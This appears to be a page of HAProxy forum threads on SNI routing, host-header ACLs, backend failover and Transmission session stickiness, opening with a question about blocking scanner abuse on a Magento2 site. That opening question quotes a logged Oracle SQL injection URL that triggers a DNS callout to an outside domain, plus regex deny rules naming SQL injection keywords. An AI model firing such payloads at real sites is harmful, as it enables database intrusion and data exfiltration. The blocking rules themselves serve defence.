Advanced abuse detection - haproxy

we are facing some netsparker scans and other abuse related things on a Magento2 installation. We already implemented rate limiting with sticky tables.
In the next step we want to acl deny specific urls.
An example
https://www.exampledomain.com/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR.GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)
We tried to setup some regex like
frontend https
bind *:443 ssl crt...
#SQL injection prevention
#acl URI_DENY url_reg -i .*(WAITFOR|WHERE|DELAY|DECLARE|SLEEP|NSFTW|DUAL)
#acl URI_DENY url_reg -i .*(SELECT)
#acl URI_DENY url_reg -i .*(convert|exec|bexec|procedure|dblink|r87.com|xp_dirtree|pg_sleep|dbms_pipe)
#acl URI_DENY url_reg -i .*(CTXSYS.DRITHSX.SN|GET_HOST_ADDRESS)
#http-request tarpit if URI_DENY
which result in application frontend errors.
How can we handle this more efficient?

Related

Is it possible to redirect a TCP connection based on host name?

What I want to be able to do is connect to a postgres server like this:
psql -h postgres-a.example.com -p 9000
That connection should be received by a proxy server (like nginx or haproxy) and it will be redirected to database A because of host name postgres-a.example.com. If I use postgres-b.example.com and the same port, it should go to database B.
I have been researching this, but I am still not 100% sure of how this would work. I read that the only way to redirect a TCP connection (psql) based on host name is using the SNI header. But I still don't understand if we will need a SSL certificate for this, or if we will need to use https://postgres-a.example.com (That doesn't make any sense to me). How it will work?
Can someone help me understand this?
Yes. You will need a certificate for TLS/SSL and you can route the requests based on req.ssl_sni to the proper backend.
I'm not sure if psql uses SNI but i think this have you check.
frontend public_ssl
bind :::9000 v4v6 crt /usr/local/etc/haproxy-certs
option tcplog
tcp-request inspect-delay 5s
tcp-request content accept if { req.ssl_hello_type 1 }
use-server postgres-a if { req.ssl_sni -i postgres-a.example.com }
use-server postgres-b if { req.ssl_sni -i postgres-b.example.com }
backend postgres-a
server postgres-a FURTHER SERVER PARAMS
backend postgres-b
server postgres-b FURTHER SERVER PARAMS
I have created a blog post with a picture for a more detailed description.
https://www.me2digital.com/blog/2019/05/haproxy-sni-routing/

HAProxy: How to match on hostname instead of the IP address

I am trying to match the host request header and use appropriate backend to route the request.
This is what I want to match on (which does not work):
acl from_external_url req.hdr(Host) -i mydomain.com
# Chrome dev tools network tab does show mydomain.com set as the Host header
However, matching to a direct IP address works (which I don't want):
acl from_external_url req.hdr(Host) -i 22.22.22.22
So, how do I make HAProxy route on hostname instead of the IP?
Update 1:
use_backend oid_external if from_external_url
use_backend oid_internal if !from_external_url
I use the below way to route based on hostname which works as I have about 12 sites going through haproxy.
acl host_mydomain.com hdr(host) -i mydomain.com
use_backend oid_external if host_mydomain.com

HAProxy - use_backend if it's available

Is there a way to utilize use_backend with an ACL match, but, in the case the backend is unavailable (down,maint,etc), then use the default?
For example:
# Define hosts
acl host_bacon hdr(host) -i ilovebacon.com
acl host_milkshakes hdr(host) -i bobsmilkshakes.com
## figure out which one to use
use_backend bacon_cluster if host_bacon
use_backend milshake_cluster if host_milkshakes
default_backend web-app-cluster
In the case above, if the bacon and milkshake backends have no available servers, to fall and use web-app-cluster?
Thanks
Yes, it is possible, for example, you could use something like this:
acl host_bacon hdr(host) -i ilovebacon.com
acl host_milkshakes hdr(host) -i bobsmilkshakes.com
# check if bacon & milk ok
acl bacon_cluster_down nbsrv(bacon_cluster) lt 1
acl milks_cluster_down nbsrv(milshake_cluster) lt 1
# use default web-app if backon & milk down
use_backend web-app-cluster if bacon_cluster_down
use_backend web-app-cluster if milks_cluster_down
use_backend bacon_cluster if host_bacon
use_backend milshake_cluster if host_milkshakes
default_backend web-app-cluster
...
Notice the use of nbsrv([<backend>]) : integer
From the docs:
Returns an integer value corresponding to the number of usable servers of
either the current backend or the named backend. This is mostly used with
ACLs but can also be useful when added to logs. This is normally used to
switch to an alternate backend when the number of servers is too low to
to handle some load. It is useful to report a failure when combined with
"monitor fail".
Check for more examples in this HAproxy post: failover and worst case management with HAProxy

Transmission Torrent behind HAProxy - HTTP Response Header used as session identifier and stickiness token

I've been trying, and failing so far, to run Transmission behind HAProxy.
If I just add a new backend and route traffic as follows:
frontend http-in
bind *:80
reqadd X-Forwarded-Proto:\ http
acl host1 hdr_end(host) -i web.host1.host
use_backend apache_backend if host1
acl transmission_host hdr_end(host) -i transmission.host1.host
use_backend transmission_backend if transmission_host
Then I get a 409 conflict error stating I have an invalid session-id header. That's pretty obvious and expected since there's a proxy in the middle.
I thought of recompiling transmission to get rid of the check, but decided in the end to face the challenge of learning a bit more of HAProxy. What did I have in mind?
Client reaches HAProxy
HAProxy connects to transmission-daemon
Daemon replies with X-Transmission-Session-Id
HAProxy stores the Session-Id somehow and replaces Session-Id sent by the client with the one captured by HAProxy.
After a lot of Googling and playing with the settings, I got an almost working configuration:
frontend http-in
bind *:80
reqadd X-Forwarded-Proto:\ http
capture response header X-Transmission-Session-Id len 48
acl host1 hdr_end(host) -i web.host1.host
use_backend apache_backend if host1
acl transmission_host hdr_end(host) -i transmission.host1.host
use_backend transmission_backend if transmission_host
backend transmission_backend
mode http
http-request set-header X-Transmission-Session-Id %hs
server transmission-daemon transmission.intranet:9091
My configuration examples are summarized.
It works, sort of. I get a login prompt for transmission, but the page loads incredibly slow. I'm more than 10 minutes in and still don't have it fully loaded.
More pages go through this proxy: HTTP, HTTPS, TCP, some load balanced, some set as fail-overs. They all load normally and fast. If I connect directly to the transmission-daemon server, it loads fast as well.
I'll keep looking around.
Any ideas?
Thanks in advance!
3 years later,
from what I've seen in https://gist.github.com/yuezhu/93184b8d8d9f7d0ada0a186cbcda9273
you should capture request and response in frontend http-in,
I didn't dug much more, but the backend seems to need
stick-table type binary len 48 size 30k expire 30m
stick store-response hdr(X-Transmission-Session-Id)
stick on hdr(X-Transmission-Session-Id)
to work

Can I use wildcard SNI matching with HAProxy?

I'm looking around trying to find an example of HAProxy matching SNI wildcards, and my searching is bringing up similarly titled, but unrelated questions about certificates.
Specifically I need to route nonce domains for dvsni with acme / letsencyrpt.
frontend foo_ft_https
mode tcp
option tcplog
bind 0.0.0.0:443
acl foo_app_letsencrypt req.ssl_sni -i *.acme.invalid
use_backend foo_bk_letsencrypt if foo_app_letsencrypt
default_backend foo_bk_default
backend foo_bk_letsencrypt
mode tcp
option tcplog
server foo_srv_letsencrypt 127.0.0.1:3443
backend foo_bk_default
mode tcp
option tcplog
server foo_srv_default 127.0.0.1:8443
Note: all arbitrary names are prefixed with 'foo_' so that the reader can easily distinguish them from keywords, directives and such.
Change
acl foo_app_letsencrypt req.ssl_sni -i *.acme.invalid
to
acl foo_app_letsencrypt req.ssl_sni -m end .acme.invalid
It's not mentioned in the official documentation
https://cbonte.github.io/haproxy-dconv/configuration-1.5.html explicitly, but I was able to find other resources that lead me to the correct result:
https://cbonte.github.io/haproxy-dconv/configuration-1.5.html#7.1.3
http://comments.gmane.org/gmane.comp.web.haproxy/14602
Note that if you were to try the first example, it would "work", but the "" would be interpreted as a literal "", not a wildcard.
Even this is very old question, I would like to share this solution, because this is still among first google's results:
The solution given by CoolAJ86 doesn't work for me (it probably works for older version of HAProxy). You can instead use ssl_fc_sni_end instead of ssl_fc_sni like this:
use_backend apache if { ssl_fc_sni_end domain.com }
It will do the work!